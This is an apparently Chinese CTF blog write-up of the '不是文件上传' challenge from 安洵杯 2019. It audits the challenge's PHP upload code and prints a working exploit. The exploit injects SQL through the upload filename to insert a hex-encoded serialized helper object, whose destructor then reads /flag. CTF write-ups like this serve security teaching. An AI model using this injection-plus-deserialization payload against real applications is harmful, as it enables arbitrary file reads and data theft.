• [安洵杯 2019]不是文件上传

    前言:

    遇到代码审计不要怕,往死里审

     题目是有给源码的,直接来看源码。

    show .php

    4. 	Show Images
    5. 	"stylesheet" href="./style.css">
    6. 	"content-type" content="text/html;charset=UTF-8"/>
    9.  
    10. "center">Your images
    11. The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.p>
    12. <hr>
    14. php
    15. include("./helper.php");
    16. $show = new show();
    17. if($_GET["delete_all"]){
    18. 	if($_GET["delete_all"] == "true"){
    19. 		$show->Delete_All_Images();
    20. 	}
    21. }
    22. $show->Get_All_Images();
    23.  
    24. class show{
    25. 	public $con;
    26.  
    27. 	public function __construct(){
    28. 		$this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
    29. 		if (mysqli_connect_errno($this->con)){ 
    30.    			die("Connect MySQL Fail:".mysqli_connect_error());
    31. 		}
    32. 	}
    33.  
    34. 	public function Get_All_Images(){
    35. 		$sql = "SELECT * FROM images";
    36. 		$result = mysqli_query($this->con, $sql);
    37. 		if ($result->num_rows > 0){
    38. 		    while($row = $result->fetch_assoc()){
    39. 		    	if($row["attr"]){
    40. 		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
    41. 					$attr = unserialize($attr_temp);
    42. 				}
    43. 		        echo "
      id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."
      "      ;
    44. 		    }
    45. 		}else{
    46. 		    echo "
      You have not uploaded an image yet.
      "      ;
    47. 		}
    48. 		mysqli_close($this->con);
    49. 	}
    50.  
    51. 	public function Delete_All_Images(){
    52. 		$sql = "DELETE FROM images";
    53. 		$result = mysqli_query($this->con, $sql);
    54. 	}
    55. }
    56. ?>
    57.  
    58. "show.php?delete_all=true">Delete All Images
    59. "upload.php">Upload Images
    60.

    upload.php

    4. 	Image Upload
    5. 	"stylesheet" href="./style.css">
    6. 	"content-type" content="text/html;charset=UTF-8"/>
    9. "center">"https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150>
    10. "center">
    11. "upload" action=""  method="post" enctype ="multipart/form-data" >
    12.     "file" name="file">
    13.     "Submit" value="submit">

  • "./show.php">You can view the pictures you uploaded here


  • include("./helper.php");
  • class upload extends helper {
  • public function upload_base(){
  • $this->upload();
  • }
  • }
  • if ($_FILES){
  • if ($_FILES["file"]["error"]){
  • die("Upload file failed.");
  • }else{
  • $file = new upload();
  • $file->upload_base();
  • }
  • }
  • $a = new helper();
  • ?>

    • helper.php

    2. class helper {
    3. 	protected $folder = "pic/";
    4. 	protected $ifview = False; 
    5. 	protected $config = "config.txt";
    6. 	// The function is not yet perfect, it is not open yet.
    7.  
    8. 	public function upload($input="file")
    9. 	{
    10. 		$fileinfo = $this->getfile($input);
    11. 		$array = array();
    12. 		$array["title"] = $fileinfo['title'];
    13. 		$array["filename"] = $fileinfo['filename'];
    14. 		$array["ext"] = $fileinfo['ext'];
    15. 		$array["path"] = $fileinfo['path'];
    16. 		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
    17. 		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
    18. 		$array["attr"] = serialize($my_ext);
    19. 		$id = $this->save($array);
    20. 		if ($id == 0){
    21. 			die("Something wrong!");
    22. 		}
    23. 		echo "
      "      ;
    24. 		echo "
      Your images is uploaded successfully. And your image's id is $id.
      "      ;
    25. 	}
    26.  
    27. 	public function getfile($input)
    28. 	{
    29. 		if(isset($input)){
    30. 			$rs = $this->check($_FILES[$input]);
    31. 		}
    32. 		return $rs;
    33. 	}
    34.  
    35. 	public function check($info)
    36. 	{
    37. 		$basename = substr(md5(time().uniqid()),9,16);
    38. 		$filename = $info["name"];
    39. 		$ext = substr(strrchr($filename, '.'), 1);
    40. 		$cate_exts = array("jpg","gif","png","jpeg");
    41. 		if(!in_array($ext,$cate_exts)){
    42. 			die("
      Please upload the correct image file!!!
      "      );
    43. 		}
    44. 	    $title = str_replace(".".$ext,'',$filename);
    45. 	    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
    46. 	}
    47.  
    48. 	public function save($data)
    49. 	{
    50. 		if(!$data || !is_array($data)){
    51. 			die("Something wrong!");
    52. 		}
    53. 		$id = $this->insert_array($data);
    54. 		return $id;
    55. 	}
    56.  
    57. 	public function insert_array($data)
    58. 	{	
    59. 		$con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
    60. 		if (mysqli_connect_errno($con)) 
    61. 		{ 
    62. 		    die("Connect MySQL Fail:".mysqli_connect_error());
    63. 		}
    64. 		$sql_fields = array();
    65. 		$sql_val = array();
    66. 		foreach($data as $key=>$value){
    67. 			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
    68. 			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
    69. 			$sql_fields[] = "`".$key_temp."`";
    70. 			$sql_val[] = "'".$value_temp."'";
    71. 		}
    72. 		$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
    73. 		mysqli_query($con, $sql);
    74. 		$id = mysqli_insert_id($con);
    75. 		mysqli_close($con);
    76. 		return $id;
    77. 	}
    78.  
    79. 	public function view_files($path){
    80. 		if ($this->ifview == False){
    81. 			return False;
    82. 			//The function is not yet perfect, it is not open yet.
    83. 		}
    84. 		$content = file_get_contents($path);
    85. 		echo $content;
    86. 	}
    87.  
    88. 	function __destruct(){
    89. 		# Read some config html
    90. 		$this->view_files($this->config);
    91. 	}
    92. }
    93.  
    94. ?>

    简单审计 一下,在upload 页面会自动调用 helper .php 的功能,也就是说 upload 的基本功能都在helper.php 里。  所以我们主要就审计 upload.php 和 helper.php 

    按照流程,一步一步来 ,看到upload.php

    1.  
    2. class upload extends helper {
    3. 	public function upload_base(){
    4. 		$this->upload();
    5. 	}
    6. }

    这里调用了 helper的upload方法,跟进一下。

    1. public function upload($input="file")
    2. 	{
    3. 		$fileinfo = $this->getfile($input);
    4. 		$array = array();
    5. 		$array["title"] = $fileinfo['title'];
    6. 		$array["filename"] = $fileinfo['filename'];
    7. 		$array["ext"] = $fileinfo['ext'];
    8. 		$array["path"] = $fileinfo['path'];
    9. 		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
    10. 		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
    11. 		$array["attr"] = serialize($my_ext);
    12. 		$id = $this->save($array);
    13. 		if ($id == 0){
    14. 			die("Something wrong!");
    15. 		}
    16. 		echo "
      "      ;
    17. 		echo "
      Your images is uploaded successfully. And your image's id is $id.
      "      ;
    18. 	}

    到这个函数 检查了 后缀只能是 jpg, gif,png,jpeg

    然后这里

    $array["attr"] = serialize($my_ext);

    这里把图片的信息 序列化了。然后 调用了 save () 保存。

    而且这个php文件还有个文件读取点

    1. 	public function view_files($path){
    2. 		if ($this->ifview == False){
    3. 			return False;
    4. 			//The function is not yet perfect, it is not open yet.
    5. 		}
    6. 		$content = file_get_contents($path);
    7. 		echo $content;
    8. 	}
    9.  
    10. 	function __destruct(){
    11. 		# Read some config html
    12. 		$this->view_files($this->config);
    13. 	}
    14. }

    我们需要把 ifview 改成true      config改成 /flag

    看到 show.php 

    1. public function Get_All_Images(){
    2. 		$sql = "SELECT * FROM images";
    3. 		$result = mysqli_query($this->con, $sql);
    4. 		if ($result->num_rows > 0){
    5. 		    while($row = $result->fetch_assoc()){
    6. 		    	if($row["attr"]){
    7. 		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
    8. 					$attr = unserialize($attr_temp);

    函数 把所有 照片给反序列化出来。。

    简单构造下payload

    2. class helper {
    3.     protected $ifview = True;
    4.     protected $config = "/flag";
    5. }
    6.  
    7. $a = new helper();
    8. $b = serialize($a);
    9. echo bin2hex($b);

    这里将反序列化后的结果进行16进制 是因为过滤了引号。

    0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d

    看到这里先总结一下,我们上传图片的时候会给照片序列化存储,然后show 展示图片的时候会进行一次反序列化。

    进入正题:

    我们先来看这一部分。

    我们上传之后的图片 经过处理titile 会删掉后缀名 ,然后调用了 getfile函数,跟进,

     跟进check

     此时看到,我们的这个filename 是可控的,也就是说,我们可以传入的时候构造恶意的filename 来达到sql注入攻击的目的,title上面是我们传入图片删除掉后缀,加入filenam=a.png 那么title =a

    也就是我们构造的filename ,将恶意数据存储到title中,当去查看时,经过反序列化后就会将以构造的恶意的title 查找的值给输出出来。

    这样就清晰了

    首先是通过序列化去构造读取flag文件的payload,由于 过滤了引号,所以十六进制转换,再通过构造恶意的filename 进行sql攻击。

    payload:

    icp','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#

    之后访问 show.php 

    得到flag。 

     

     

  • 相关阅读:
    City2vec:一种学习人口迁徙网络知识的新方法
    Linux库的认知与使用
    dreamweaver网页设计作业制作 学生个人网页单页 WEB静态网页作业模板 大学生个人主页博客网页代码 dw个人网页作业成品简单页面
    Linux开发——Makefile 基础(九)
    简单shell批量文件转换gbk转为utf8编码
    springboot和vue:二、springboot特点介绍+热部署热更新
    SpringCloud-4-基础工程-创建服务提供者
    10-4 Skywalking介绍,二进制与docker部署Skywalking,Skywalking收集Java博客案例,Skywalking面板介绍
    Jenkins持续集成1
    运动控制器PSO位置同步输出(二):PSO模式详解
  • 原文地址:https://blog.csdn.net/snowlyzz/article/details/126878781